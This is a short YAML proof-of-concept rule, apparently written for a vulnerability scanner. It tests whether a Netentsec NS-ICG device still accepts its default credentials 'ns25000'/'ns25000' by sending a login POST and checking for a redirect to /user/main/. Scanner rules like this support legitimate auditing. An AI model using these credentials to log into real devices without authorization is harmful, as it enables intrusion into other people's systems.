transport: http
name: yaml-poc-netentsec-ns-icg-default-password
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /user/login/login
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: usrname=ns25000&pass=ns25000&signinfo=&ukey_user_flag=0&SlotSerialNumber=
        expression: response.status == 302 && response.headers["Location"] == "/user/main/"
expression: r0()